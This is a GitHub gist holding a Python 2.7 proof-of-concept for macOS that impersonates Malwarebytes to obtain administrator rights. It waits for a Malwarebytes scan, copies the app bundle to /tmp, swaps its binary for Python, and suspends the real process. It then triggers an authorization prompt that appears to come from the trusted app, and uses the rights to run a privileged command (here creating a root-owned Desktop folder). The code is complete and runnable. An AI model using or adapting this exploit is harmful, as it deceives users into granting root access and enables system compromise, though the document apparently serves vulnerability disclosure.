Created
October 13, 2020 18:36
-
-
Save nikolay-n/24e69db265df732c59ff42f1d628c4c2 to your computer and use it in GitHub Desktop.
Fake privileged helper auth
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python2.7 | |
# -*- coding: utf-8 -*- | |
import os | |
import sys | |
import subprocess | |
import shutil | |
import time | |
python_bin = "/System/Library/Frameworks/Python.framework/Versions/2.7/Resources/Python.app/Contents/MacOS/Python" | |
last_bundle_path = subprocess.check_output(['mdfind', "kMDItemCFBundleIdentifier == com.malwarebytes.mbam.frontend.launcher"]).strip("\n") | |
if not last_bundle_path: | |
print("Hmm, no Malwarebytes found!!!") | |
sys.exit(-1) | |
f = subprocess.Popen(['log', 'stream', '--predicate', 'process == "FrontendApplication" && eventMessage CONTAINS[c] "scanInProgress"', '--debug'], stdout=subprocess.PIPE, stderr=subprocess.PIPE) | |
while True: | |
line = f.stdout.readline() | |
if "inProgress.title.scanInProgress" in line: | |
break | |
print("Malware scan started") | |
tmp_script = "/tmp/auth.py" | |
# most of code from https://gist.github.com/pudquick/bc1ad98e7ee0a50fba94 | |
with open(tmp_script, "w") as f: | |
f.write('''#!/usr/bin/python2.7 | |
import os | |
from ctypes import CDLL, Structure, POINTER, c_char_p, c_size_t, c_void_p, c_uint32, pointer, byref | |
Security = CDLL('/System/Library/Frameworks/Security.framework/Versions/Current/Security') | |
prompt = "" | |
mkdir_bin = "/bin/mkdir" | |
flag_path = os.path.join(os.path.expanduser("~/Desktop"), "DirOwnedByRoot") | |
class OpaqueType(Structure): | |
pass | |
class AuthorizationItem(Structure): | |
_fields_ = [('name', c_char_p), | |
('valueLength', c_size_t), | |
('value', c_char_p), | |
('flags', c_uint32), | |
] | |
class AuthorizationItemSet(Structure): | |
_fields_ = [('count', c_uint32), | |
('items', POINTER(AuthorizationItem)), | |
] | |
class FILE(Structure): | |
pass | |
OpaqueTypeRef = POINTER(OpaqueType) | |
AuthorizationRef = OpaqueTypeRef | |
kSMRightModifySystemDaemons = "com.apple.ServiceManagement.daemons.modify" | |
kSMRightBlessPrivilegedHelper = "com.apple.ServiceManagement.blesshelper" | |
kAuthorizationRightExecute = "system.privilege.admin" | |
kAuthorizationEnvironmentPrompt = "prompt" | |
kAuthorizationEmptyEnvironment = None | |
kAuthorizationFlagDefaults = 0 | |
kAuthorizationFlagInteractionAllowed = (1 << 0) | |
kAuthorizationFlagExtendRights = (1 << 1) | |
kAuthorizationFlagPartialRights = (1 << 2) | |
kAuthorizationFlagDestroyRights = (1 << 3) | |
kAuthorizationFlagPreAuthorize = (1 << 4) | |
AuthorizationCreate = Security.AuthorizationCreate | |
AuthorizationCopyRights = Security.AuthorizationCopyRights | |
AuthorizationExecuteWithPrivileges = Security.AuthorizationExecuteWithPrivileges | |
authref = AuthorizationRef() | |
result = AuthorizationCreate(None, kAuthorizationEmptyEnvironment, kAuthorizationFlagDefaults, byref(authref)) | |
multi_right = (AuthorizationItem*3)() | |
multi_right[0].name = kSMRightModifySystemDaemons | |
multi_right[1].name = kSMRightBlessPrivilegedHelper | |
multi_right[2].name = kAuthorizationRightExecute | |
rights = AuthorizationItemSet() | |
rights.count = 3 | |
rights.items = pointer(multi_right[0]) | |
env_items = (AuthorizationItem*1)() | |
env_items[0].name = kAuthorizationEnvironmentPrompt | |
env_items[0].valueLength = len(prompt) | |
env_items[0].value = prompt | |
env = AuthorizationItemSet() | |
env.count = 1 | |
env.items = pointer(env_items[0]) | |
flags = kAuthorizationFlagDefaults | kAuthorizationFlagPreAuthorize | kAuthorizationFlagExtendRights | kAuthorizationFlagInteractionAllowed | |
result = AuthorizationCopyRights(authref, byref(rights), byref(env), flags, None) | |
argv = [flag_path] | |
argv = (c_char_p * (len(argv) + 1))(*(argv + [None])) | |
channel = POINTER(FILE)() | |
if result == 0: | |
result = AuthorizationExecuteWithPrivileges(authref, mkdir_bin, kAuthorizationFlagDefaults, argv, byref(channel)) | |
''') | |
mbam_pid = subprocess.check_output(['pgrep', 'FrontendApplication']).strip("\n") | |
tmp_bundle_path = "/tmp/Malwarebytes.app" | |
shutil.copytree(last_bundle_path, tmp_bundle_path) | |
mbam_bin = os.path.join(tmp_bundle_path, "Contents", "MacOS", "Malwarebytes") | |
os.unlink(mbam_bin) | |
shutil.copy(python_bin, mbam_bin) | |
subprocess.check_call(["kill", "-SIGSTOP", mbam_pid]) | |
subprocess.check_call([mbam_bin, tmp_script]) | |
subprocess.check_call(["kill", "-SIGCONT", mbam_pid]) | |
os.unlink(tmp_script) | |
shutil.rmtree(tmp_bundle_path) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment